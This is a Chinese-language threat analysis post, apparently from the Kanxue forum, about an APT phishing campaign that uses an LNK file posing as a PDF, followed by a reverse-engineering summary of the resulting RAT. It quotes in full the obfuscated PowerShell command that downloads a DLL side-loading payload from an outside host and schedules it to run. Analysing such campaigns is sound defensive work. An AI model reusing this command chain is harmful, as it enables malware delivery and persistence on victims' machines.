之健 2025-09-13 17:59 上海
看雪论坛作者ID:之健
初始入侵lnk文件钓鱼
威胁行为者通过发送带有恶意lnk文件的钓鱼邮件来发起攻击。lnk文件伪装为pdf文件诱导受害者点击,当受害者点击后会通过Pester.bat执行恶意的power shell命令。
命令如下:
"C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;$ProgressPreference ='SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et $a//expouav.org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";wg''et $a//expouav.org/download/fetch/list7/40275/view/e49c7ae0-f3d1-4073-83bb-b4ecba929fec -Outfile $c\Tasks\lama;r''e''n -Path "$c\Tasks\lama" -NewName "$c\Tasks\vlc.pepxpe";r''e''n -Path "$c\Tasks\vlc.pepxpe" -NewName ((Split-Path "$c\Tasks\vlc.pepxpe" -Leaf) -replace "p", "");wg''et $a//expouav.org/download/fetch/list5/19577/view/b5aaa6f0-6259-4ccb-b31a-d21e40c2eeff -Outfile $c\Tasks\lake;r''e''n -Path "$c\Tasks\lake" -NewName "$c\Tasks\libvlc.pdplpl";r''e''n -Path "$c\Tasks\libvlc.pdplpl" -NewName ((Split-Path "$c\Tasks\libvlc.pdplpl" -Leaf) -replace "p", "");wg''et $a//expouav.org/download/fetch/list6/41568/view/701bbff4-8fcb-4e9c-8577-00aed06d8443 -Outfile $c\Tasks\dalai;r''e''n -Path "$c\Tasks\dalai" -NewName "$c\Tasks\Winver.pepxpe";r''e''n -Path "$c\Tasks\Winver.pepxpe" -NewName ((Split-Path "$c\Tasks\Winver.pepxpe" -Leaf) -replace "p", "");c''p''i "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf" -destination .;wg''et $a//expouav.org/download/fetch/list8/20041/view/c6795195-6e84-4720-9420-e03da09b2187 -OutFile $c\Tasks\vlc.log;$d="$c\Tasks\Winver";s''ap''s $d -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "$c\Tasks\vlc", '/f';e''r''a''s''e *d?.?n?powershell 脚本通过在expouav.org下载多个文件。
具体下载的文件信息如下1、欺骗显示的pdf正常文件Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf2、合法的播放器文件vlc.exe3、恶意的dll库libvlc.dll4、合法的Microsoft任务计划程序Winver.exe5、加密的shellcode文件vlc.log通过下载的Winver 文件创建计划任务执行vlc文件。然后通过合法的vlc.exe加载恶意的libvlc.dll库,解密执行shellcode。由于未下载到shellcode文件,以下对shellcode释放的最终负载RAT做分析。
RAT逆向分析
隐藏窗口
唯一实例
创建互斥体ghjghkj
获取用户信息发送注册包
部分信息如下
用户名
计算机名
本地IP与出口IP地址
创建线程通过HTTP发送注册包
数据发送前经过base64编码与aes加密
base64
aes
命令执行循环
发送cuud 包获取命令
命令3Up3:上传文件,可执行
命令3gjdfghj6:执行CMD命令
命令3ngjfng5:下载文件
命令3CRT3:远程线程注入执行
命令3APC3:APC注入执行
命令3SC3:屏幕监控
参考链接
https://arcticwolf.com/resources/blog/dropping-elephant-apt-group-targets-turkish-defense-industry
*本文为看雪论坛优秀文章,由 之健 原创,转载请注明来自看雪社区
1.25折早鸟票开售!9月23日截止
球分享
球点赞
球在看
点击阅读原文查看更多
